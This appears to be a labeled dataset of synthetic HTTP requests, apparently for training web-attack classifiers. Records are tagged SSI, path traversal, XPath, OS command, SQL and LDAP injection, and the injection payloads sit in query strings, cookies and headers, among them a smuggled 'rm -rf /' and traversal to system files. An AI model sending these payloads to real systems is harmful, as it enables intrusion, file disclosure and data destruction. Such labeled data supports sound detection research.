Date: Mon, 23 Mar 09 10:14:57 UTC
ETag: W/"-RDngPjuCzDvl8YcGOv0"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Thu, 08 Dec 05 14:42:54 CET
If-Match: *
If-None-Match: *
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 93
MIME-Version: 1.6
Pragma: oa=t
Proxy-Authorization: fuk0 Snle7=7Sop
Authorization: ineri httr=dlatwt3E
Range: 560-83908
Referer: http://www.6ebE.it/sdyu/zwcl.swf
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: 5LZGtTi http://www.ydlhh.biz
UA-CPU: StrongARM
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: i2lvb/5.4 85.182.32.158, HTTP/2.8 www.cdie.jpeg:6, 9.6 154.112.115.158:89
Transfer-Encoding: jsiflo
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49270
Start - Id: 39201
class: SSI
PUT /2P8/3iyFUttwmYcoqte68s/eReM3F@To-7yPr/dWlt-pnEGZMFJ/sfX2v1DkhfH/nodeb3qYg2fHhf/w0nLoias7etcumsy/mjiheNraoodnE/nP/xsejkTgmzfmJ.jpg? HTTP/1.0
Content-Length: 294
Content-Language: r,s,sg6ln
Content-Encoding: deflate
Content-Location: http://www.tcea.cz/tAns9a/oTe6i/bsziqm/tyinm/tytasee.txt
Content-MD5: cnd5bHJjcmRRdG51Y2Rkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Feb 07 11:50:07 UTC
Last-Modified: Sun, 29 Oct 06 24:01:12 UTC
Host: www.hiy6bt.de:13732
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-2022-jp, windows-1253;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 214.102.152.111
Cookie: at8UeamI=n%;tHrEdtofmnhsxnh=as;mdeunlts=8011793;Dj2Tt=9600849
Cookie2: $Version="690"
Date: Thu, 23 Mar 06 02:19:15 UTC
ETag: W/"_bPK-Nwbl2.qlgL"
Expect: 100-continue
From: 6ikA@Trnnt5erl.uk
If-Modified-Since: Tue, 30 May 06 22:24:16 GMT
If-Unmodified-Since: Thu, 05 May 05 14:36:23 UTC
If-Match: *
If-None-Match: *
If-Range: "nIPxMLXiobi6t._wG"
Max-Forwards: 8047
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: dlel tipu=gsey
Authorization: Basic b0Z3aHM6dHJmZGduc2U=
Range: -6444
Referer: /yLpO/ggq6hdle/23eDwr/aaaxigey/azeferrs.pl
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.2 (compatible; MSIE 5.4; Mac OS X; 3era)
UA-Disp: 375,7789,32
UA-Color: color16
UA-Pixels: 466x9263
Via: 3.0 www.ueiNo.tiff
Transfer-Encoding: oismac
Upgrade: rsq/5.8, einc/6.2, tohA/8.2, cdtd6/5.7
Warning: 774 www.u1nAt.tiff:5 "nuNymcpsqnfp7abDt" 
X-Forwarded-For: 113.114.213.108
X-Serial-Number: 4765226560917916
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

p9nhtt6g2oiRce=imets&heedefierie=zliF&Sisih4rPdss=823&6resTxlpDo= t9u+phpk4wmr&aF=vssoltoo&wKary=9&stavtt=38119&rnvduetRie=rnn&ooemfs3eyNszUhe=1918198&zhaMtroeMmeh=48151143&ietpnhto=<!--    #exec    cgi="/cgi-bin/script?bt"   -->&TZ-M7Go=kEem&dhteil4nst=otam9ldolioxg6dsht

End - Id: 39201
Start - Id: 40065
class: SSI
GET /iAAP6Oy/vdh5rxpBjUBfsFTxmH/olaropeNrzsiid/hfAxrIhdo/jy3EiframeuoptX/sVcr7gTwep.png?tuu=wZ3S2yN7&ltcoXAo3rt=6&erab=3256584421&ibiHfBFlOEI0=%3C%21--++%23exec++++cmd%3D%22%2Fbin%2Fls++++-l+%2Fhome%2Fp3sb%2FTYjha5%22+++++--%3E&pYtpn=%3E HTTP/1.0
Host: www.ceieeea.net
Connection: 0etn
Accept: application/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: compress
Accept-Language: stdilfeb-oasoEfhe;q=0.4, Gaoahboh-mtbe4;q=0.1, Susasc-anfs;q=0.8, ocq9ia-ya, den1-n
Cache-Control: no-store
Client-ip: 159.72.147.40
Cookie: Thhouno=w0ianhee0edllro;fHuga9anbjzic=u;lfaeccodcpAt=d9oenxdrofee9rns;93R=/>ldvar Ne;3Euasetv3i=lJNCioogwlnadymte
Cookie2: $Version="846"
Date: Wed, 31 Mar 10 21:38:39 GMT
ETag: W/"m822BdROxDnURNjxK_V."
Expect: ox4t=ecsoWvu
From: uohepreO@9Mntu.biz
If-Modified-Since: Fri, 28 May 04 01:26:50 UTC
If-Unmodified-Since: Mon, 11 Jun 07 14:48:42 UTC
If-Match: *
If-None-Match: *
If-Range: "T-vmJJkQA.ib@jMqAMb"
Max-Forwards: 3
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic NnRpYWQ6cmU3cnRxMQ==
Authorization: tl9c hsege=n6enN
Range: -24
Referer: http://eHoew.st/ieiTBhie.js
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: deuCl6zhhi5
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: gzip
Upgrade: ToKh/4.1, goe/9.9, moax/0.8
Warning: 663 218.132.101.135:43 "dtnhpn" 
X-Forwarded-For: 80.113.88.94
X-Serial-Number: 827844806951903095
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40065
Start - Id: 45884
class: PathTransversal
GET /sBHebj9.fPG3qJvA9Hq/e@XQkOK9a2wa/x8y/sTZQ/lR1esb4WGZYg.dll?he=dropmeg&mTye=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&shsesIjnEejfcG=tlve1eseet7eaai&iaisufl4ffpn=lafn%29mmetat HTTP/1.0
Host: www.itw3.st:80
Connection: close
Accept: video/quicktime, video/*;q=0.2
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 58.223.222.209
Cookie: h9emureouw=086193161;M4LformvJ=dhqTcs;VGncdlyNsock_streamG=eOkseaqi3o
Cookie2: $Version="738"
Date: Tue, 10 Mar 09 19:20:00 CET
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Sat, 27 Mar 04 01:55:03 CET
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: "6ZoJKPLkFBZhBOd"
If-None-Match: "BTyz_6tsDEPm5Zt"
If-Range: Sun, 04 Jun 06 01:21:45 GMT
Max-Forwards: 8
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: NTLM b0VYaXJIbndSVHhlaXlhZXN1OGVpZXJwZWFueE9laWFudHNicDJoc2VlZHY=
Range: 81947-,357703-
Referer: /lewr/adi3ues/6lFli/r7h95nhe.mdb
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 2.6; 9c-hk; rv:1.8.7) Gecko/52640075
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: hefsr/6.5, dHr/8.0, ntceiI/7.2, aesn/7.0
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45884
Start - Id: 44768
class: PathTransversal
GET /6C2IsodOcp6/hIYGqLV-kRq/ehb-HZconnect/5bVi6hldtttd2adacewi.js?stteaaiuesdn=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F HTTP/1.1
Host: 185.195.220.46:6632
Connection: dwoahsoc
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 98.197.118.87
Cookie: GEG5xtHYjK=~a(ml'atudi o;NExOexecIo=42441
Cookie2: $Version="18"
Date: Wed, 10 Jan 07 07:03:35 CET
ETag: "c6fxIQPuWvBL.Br"
Expect: mgs1
From: Strga@kmekoca.fr
If-Modified-Since: Fri, 26 Jan 07 16:57:41 GMT
If-Unmodified-Since: Sun, 12 Feb 06 20:45:36 UTC
If-Match: *
If-None-Match: "_Y2dn76.w9B@DcvR"
If-Range: Wed, 23 Jul 08 11:47:37 CET
Max-Forwards: 9
MIME-Version: 1.4
Pragma: tiqhp9s='rt3Tise'
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Basic TGNhdHV0YzpEZWFyb2I0
Range: 6578-336232,-258470,45228-5909
Referer: http://www.l3yNatIr.org/uojvatst/2hc5h/nqralnr/uHur.mp3
TE: deflate
Trailer: TE
User-Agent: ewLwEv http://www.twesoap.it
UA-CPU: Sparc
UA-Disp: 4597,5625,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 332x3916
Via: 7.1 www.hneoy.tiff
Transfer-Encoding: compress
Upgrade: get/0.4, rgtf/4.9, Eac8/3.7, zbsjne/6.4, erdN/2.3
Warning: 075 226.115.253.85 "3EIasrapsapthhse" "Sun, 24 Oct 04 16:27:54 CET"
X-Forwarded-For: 177.203.165.156
X-Serial-Number: 2157159271334
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44768
Start - Id: 48462
class: XPathInjection
GET /lSbk0EAElPAneuT1D5bw/ocbodtio/sealv/2Nunr/Estitijcaltp8gCHalr1/irshrnmn3tbQeT.shtml?owsrteearltsor=404&lciwsnmmoAtm=toVM&rrdetibpc=9495077&vx_lQzVP=CCy&sAtt=y&raotfoef8=m2o8raanriroeKssen&zbe26ylESTsee=muG7ad6g&xFSlogJANdjM=27&lhne2nofT1Rskat=ayjb&cleefnbtp=rte8uwEOj70w&Axml91R_m=rE%40DZR&h93=+aiee&AHV3N=ec&eftph2dYWdnicform=+l HTTP/1.1
Host: www.0em9eoMda.biz:80
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: Oot5tnet-s;q=0.1, xKrworL-uz;q=0.4, e-on;q=0.9, 2istwpA-Zmeirafd;q=0.1, reaLfhq-y;q=0.2
Cache-Control: no-cache
Client-ip: 85.232.155.114
Cookie: dFdDgm=76708275;9o@Z2wI=6'3phpu(\tR;oew=aeld2uhz'   or  1<    n/cuo/flli/child::text()[position()=78]  or   'eehiasEu' = ';7be4=t1h
Cookie2: $Version="7"
Date: Fri, 06 Mar 09 24:04:00 GMT
ETag: "VaD9kGWv0ENohkXhy"
Expect: 100-continue
From: rsmtnu@oinf.st
If-Modified-Since: Sat, 17 May 08 24:21:11 GMT
If-Unmodified-Since: Wed, 05 Oct 05 12:25:54 CET
If-Match: "jxJHtw7onTO9ZQpZQNh"
If-None-Match: *
If-Range: Tue, 27 May 08 04:51:42 CET
Max-Forwards: 3
MIME-Version: 4.7
Pragma: reagRtfe=reads
Proxy-Authorization: NTLM ZHplNHFveWk1T3BFbW56ZW5zd2ZlaHJyY2l0dW1VYXRlbW9henMzMGRhUmVoYXNz
Authorization: Digest opaque="naeay"
Range: -4857,-4061,8-529315
Referer: /doieo7/n5l1bnr/ecLe.gif
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.8 (Windows; U; Win 9x 2.3; cn-ht; rv:2.7.5) Gecko/51542663
UA-CPU: PowerPC
UA-Disp: 746,1547,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1568x1912
Via: HTTP/5.3 www.sohss7s.jpg, HTTP/3.3 www.zGmn.tiff, cdtwEn/0.2 www.lsjr.shtml
Transfer-Encoding: deflate
Upgrade: nnn/0.7, rrk/3.0, eFiou/2.4, To4yt/2.6
Warning: 461 www.sehTaj.shtml "5dtllieE30en8a" 
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48462
Start - Id: 43805
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.p1bbdger2.ch
Connection: snosuv
Accept: */*
Accept-Charset: iso-2022-jp, iso-8859-4;q=0.8, iso-8859-8, windows-1250;q=0.7, isiri-3342;q=0.8
Accept-Encoding: identity;q=0.0, compress, gzip, identity, compress
Accept-Language: *;q=0.7
Cache-Control: max-age=918
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="9"
Date: Mon, 26 Jun 06 18:05:51 CET
ETag: "@ZVFdx6HfZRC.m2OXS8f"
Expect: u9re=alahjAwN
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Sat, 09 Dec 06 22:34:46 GMT
If-Unmodified-Since: Sun, 31 Jan 10 22:26:55 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: qutgt3 dhItvrl=r0cr5f
Range: 904036-,02113-35,44499-
Referer: /d7r7/tipbge/atoh7evr.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: tlbem (t_NUo1)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: 3.1 7.18.27.109
Transfer-Encoding: identity
Upgrade: Rteoa/6.1, seif/8.2, nnyoe1/3.7, ai7g/8.2
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43805
Start - Id: 41624
class: SqlInjection
GET /oYneh3nlR1n8asotiSo/5rztdemlty1ms/8Xge5tLUWdm6Sr/yO/uabadsfddbbvd/ggg3mMJ@dL0@XgKP/irNe.js?l2eye9H=++++OR+++2+++%3E++1&2t7leAm=65847178&xens=%29xA&aap=TnLevlSoiporeIrn&LteuhrBmuioe=eonwgitP9rl&hh6hh4utt=ee&arbW=t&UunionRPJ=7atod HTTP/1.1
Host: www.dhrt.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: At6-esybhae;q=0.8, ro-o, nn-tbEr7;q=0.1
Cache-Control: max-stale=3
Client-ip: 166.71.235.134
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Fri, 12 Feb 10 23:17:40 UTC
ETag: W/"QJQjrAZViFkDgz2hkW"
Expect: llbt0
From: tcssd@oays6you.com
If-Modified-Since: Fri, 04 Apr 08 13:20:17 GMT
If-Unmodified-Since: Fri, 22 Oct 04 16:07:36 UTC
If-Match: "cxlhbw7Kf3x.fkR4"
If-None-Match: "sceeC3aQBc-CjBvVZH"
If-Range: "@6pLqETsD3aKVFaLJ"
Max-Forwards: 918
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: akeo5s nryIh=hnabaoI
Authorization: NTLM ZVN1NnFuZGx2cmVvNWNoZHRzaXRrZHNxZmVOdGVodGFnbjJlMnNjb3I=
Range: 537-
Referer: /h5raeys.exe
TE: trailers
Trailer: Via
User-Agent: td7QwMz8o http://www.henr.st
UA-CPU: StrongARM
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 064x464
Via: 2.8 www.t5as.js
Transfer-Encoding: identity
Upgrade: n0A/2.2, tlanud/5.2
Warning: 971 www.l4ihl.css "jglskraM3styhIle" "Mon, 26 Jan 09 22:24:50 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41624
Start - Id: 46261
class: PathTransversal
GET /ek_RN72maPhmv2CyNa/ieyutr/e.7mJX9CV/te2eyeZhteneyfn.jsp?UCFJhavingM=31536713&cEopertdYttlk=iduuq&ispluwrdeo=ir0tetcitelneturaccepty8&qN9HpOIOcstdinhk=oyvw&hahsdAg8oan=tperlh&t7r5mora=%2Fetc%2Fhttpd%2Fhttpd.conf&inducohone=6733&xe3acA=i3ifpkM&anhexatcdeajt=includeeval6t%2B&uaeeno=5&PURX0=8oroo+&Ka7Qb=ldi5o HTTP/1.0
Host: 112.102.85.219
Connection: 7Hhro5
Accept: text/html
Accept-Charset: shift_jis;q=0.7, utf-8;q=0.6, euc-kr, ks_c_5601-1987;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=41
Client-ip: 117.131.231.99
Cookie: fhF3ZTjs=hia
Cookie2: $Version="03"
Date: Tue, 05 Jan 10 10:37:27 CET
ETag: "VNc9YS_adiG6@ph7"
Expect: 5hrhmAa=eezafs
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: *
If-None-Match: "rE1Uw2SCuKqCi7o"
If-Range: *
Max-Forwards: 450
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: cibEh 2hct8=naasvou
Range: 5263-
Referer: /enje8shx/cbqogb.js
TE: gzip,trailers,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/6.0 (X11; U; Solaris 9.1; zi-we; rv:8.2.2) Gecko/88936511
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 2.6 50.228.97.226
Transfer-Encoding: compress
Upgrade: roeie/1.4
Warning: 196 158.163.201.157 "scotgrnti" "Tue, 25 Mar 08 07:11:27 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46261
Start - Id: 45457
class: PathTransversal
GET /sSORy.Q5t5Mj.mdb?naoytosvatesr=2%3A%5Cautoexec.bat&hpmNeeE3=%27&sLbetween4laITL=o1f&AFmGs7JW=sPPDt&ibndfhtjc=37246132 HTTP/1.1
Host: 162.6.53.207:51
Connection: close
Accept: text/*, image/jpeg, text/plain;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rs-r
Cache-Control: no-store
Client-ip: 140.149.19.126
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="857"
Date: Thu, 23 Mar 06 02:08:50 UTC
ETag: W/"o8fx-z1BO6xcIq.EZFb"
Expect: 100-continue
From: wXuowl@fhcnteilt.be
If-Modified-Since: Thu, 31 Jul 08 06:23:31 GMT
If-Unmodified-Since: Fri, 01 Sep 06 21:38:03 UTC
If-Match: *
If-None-Match: "iYiinQsTzQeL28NRQ"
If-Range: Tue, 18 Oct 05 21:47:39 UTC
Max-Forwards: 2
Pragma: eN='8'
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: NTLM ZWxoczdkM3J0aHNSeHNkeWJ0c29lZW1obGFuek50NGhy
Range: -884,93-882862,81022-507
Referer: /hteNnpuq/meeo/aaAjcl/touts/m0eis.jpg
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 4.8; dh-cW; rv:4.7.3) Gecko/53891799
UA-Disp: 5444,1005,8
UA-OS: Win9x
UA-Color: color8
Via: 4.8 www.ocwfdia7.jpg:7894, olkan/6.1 171.27.90.190
Transfer-Encoding: compress
Upgrade: n2elld/6.0, erooc/8.0
Warning: 772 13.181.197.72 "EhhrrueNfweeetlyl" "Sun, 20 Dec 09 03:55:23 GMT"
X-Forwarded-For: 176.191.17.103
X-Serial-Number: 347804024892974921
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45457
Start - Id: 50020
class: XPathInjection
POST /d@xbAnVF/ssc2m7n.jpeg? HTTP/1.0
Content-Length: 74
Content-Language: ou,t
Content-Encoding: identity
Content-Location: /I5Elsp.jsp
Content-MD5: emVlRXBxc2d0dHJndGZhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Feb 06 11:02:10 GMT
Last-Modified: Tue, 07 Jul 09 10:28:31 UTC
Host: www.ftxBAifits.ch
Connection: neOn
Accept: */*;q=0.9
Accept-Charset: iso-8859-8-i;q=0.3, windows-1257;q=0.3, iso-8859-7;q=0.5
Accept-Encoding: identity;q=0.8, compress;q=0.7, compress;q=0.5, deflate
Accept-Language: nvhnc'    or    6 <   count(path/child::*)   or     'weela'= '
Cache-Control: no-store
Client-ip: 21.168.135.247
Cookie: tncsfn=slservicesle;nr=47984596;br7yU=80326179;dmabdt=aPx
Cookie2: $Version="4"
Date: Sun, 11 Oct 09 01:58:42 CET
ETag: "JNImyIsVCIyz3habo"
Expect: e6e4wdEw
From: helbt@metbhhshe.st
If-Modified-Since: Mon, 12 May 08 09:28:12 UTC
If-Unmodified-Since: Sat, 18 Jun 05 03:26:49 CET
If-Match: "B_p5jFysGQtPMPdr_zLW"
If-None-Match: *
If-Range: "7gl.iyeWgPaX3_N-nAly"
Max-Forwards: 08
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dHNuOG86emxtYkd5b2g=
Authorization: NTLM VXQ3ZjNydEhnRXluNTZjYTN2MHBya25wOG5pbmV1b3dxRXc3ZWQzY29pb3hl
Range: 7-907,5585-81749,-584464
Referer: /kwues4ar/fi9dis/o21m.jsp
TE: trailers,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/3.2 (X11; U; Open BSD i386 5.2; ei-yo; rv:4.4.1) Gecko/76650210
UA-CPU: 68000
UA-Disp: 5607,073,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2146x828
Via: FTP/6.6 www.atollqtt.htm, 2.7 www.sqs2yi.shtml
Transfer-Encoding: gzip
Upgrade: exR/8.9, zdsd/9.0, tOnl/2.3, 6fWla/2.1, ssod/8.7
Warning: 122 161.241.199.246:74079 "tsotlrnCt" "Sat, 16 Apr 05 20:50:24 UTC"
X-Forwarded-For: 84.189.52.115
X-Serial-Number: 69751520356030770704
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

alre75ew9=08&CG35PvO=1694763&ben10f7kntOicdi=nytg2K&algawnAeeauee=eHMvusH_

End - Id: 50020
Start - Id: 38850
class: LdapInjection
GET /nX77c.aM6QMG@s/go/oScVJ/eotroee/e1uyte8uc6Bs7ab.pl?nh8scriptU8oX=qin3UwL4&eDa=j3ssfneiletidn&tixb4drne=44691534&GlJU8v.Ehomeetc=0prio%5Cfte5&itamrtifeehd=tar2swru&aeye=koBtbgsound0egm+%3D+o&kMDchildchild9Pqo=428555007&doarbk=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&IeinputshutdownkLd=n%7E%28in&xkEo7f=o5ip HTTP/1.0
Host: www.hddnH.de:80
Connection: keep-alive
Accept: image/*, video/*
Accept-Charset: *
Accept-Encoding: deflate, compress, compress;q=0.9, identity
Accept-Language: *
Cache-Control: max-age=56
Client-ip: 149.133.119.108
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="36"
Date: Thu, 10 Jan 08 21:59:20 UTC
ETag: W/"q@gwKxzEx8Iq1.Wec@y"
Expect: beeepata=O503do;rmagetie
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Wed, 08 Mar 06 04:13:33 GMT
If-Unmodified-Since: Mon, 14 Apr 08 06:53:13 UTC
If-Match: "MFf2_gMe3wcMlaH.Obz"
If-None-Match: "@nXv3OGmTIP_@ISF56U"
If-Range: Tue, 25 Apr 06 21:32:26 UTC
Max-Forwards: 1
MIME-Version: 3.5
Pragma: huo='hjr'
Proxy-Authorization: Digest nonce
Authorization: Basic enN1MDdwdW86c3NoZW1pYQ==
Range: -390702,-162,16550-
Referer: http://www.ainjh0.gov/ufeit.wmn
TE: trailers
Trailer: Via
User-Agent: atAera4ss/0.3.4.0
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9479x714
Via: 3.2 128.222.169.209
Transfer-Encoding: identity
Upgrade: O88/7.9, ieosN/1.3, eTtno/0.5, aah/4.6
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 145.148.155.9
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38850
Start - Id: 43422
class: OsCommanding
GET /u@F/n.X/af6oet9/nuB/Bur3scriptksock_streamR3/tqqoeyld.png?iaoFamnuel=88854&0idq_miI=slmalnfh%2B&riud7soeste=%60rm+++-rf++++%2F%60&dha9gnTg5ldzilC=Oewtpasswdaiaok%40y8Re&gemsiisresrfs=tF2sRRg&Kaurform0lh=im&Elyu=IZrlk HTTP/1.1
Host: www.ut2erh.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Fcak-d5da;q=0.7, 5rg-saxeoTcN, tit-errz;q=0.8, doo-e
Cache-Control: idae='hoaessy'
Client-ip: 32.53.172.91
Cookie: 9eeIi=a&rtr80i nb;0il=leaccess_logadmineae1n+)EL?tps9c%link;bktapbvwr=3873
Cookie2: $Version="5"
Date: Tue, 24 Jun 08 22:53:47 UTC
ETag: "4NsrfC_QJwuMw5JBGe"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Thu, 09 Aug 07 12:26:12 CET
If-Unmodified-Since: Sun, 25 Jul 04 22:06:29 UTC
If-Match: *
If-None-Match: *
If-Range: "XVF7v0palxOKh_Xy"
Max-Forwards: 8
MIME-Version: 7.3
Pragma: le7='raEfyt'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest nonce
Range: 5130-,89497-47998,93-50140
Referer: /jboeiow/Lieqbafi/lHreisbd/cihod.png
TE: chunked;q=0.2
Trailer: Warning
User-Agent: Mozilla/0.8 (X11; U; Linux i386 6.0; es-ch; rv:4.2.6) Gecko/79350262
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 319x516
Via: 7.5 www.lijtnu.tiff, HTTP/2.8 www.onathee.png:92, 3.8 www.uRHvelq.css
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43422
Start - Id: 44111
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.lt36rwie.org
Connection: keep-alive
Accept: image/gif;q=0.9, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: az8ion-tDh;q=0.7
Cache-Control: only-if-cached
Client-ip: 249.225.32.40
Cookie: cuhwme4aae=647
Cookie2: $Version="590"
Date: Thu, 12 Jul 07 05:39:47 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Sat, 22 May 04 13:54:30 CET
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: "fKEF0dZiePItOjLu"
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 1
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic ZTA4aG86eWVvZA==
Authorization: Digest response="afdC7c9C382D67aA3EeB6f57DBcE82f1"
Range: 827-
Referer: /ndrotp.jpg
TE: deflate
Trailer: Date
User-Agent: Mozilla/9.7 (Windows; U; WinNT 2.6; h6-nI; rv:8.4.2) Gecko/12897382
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
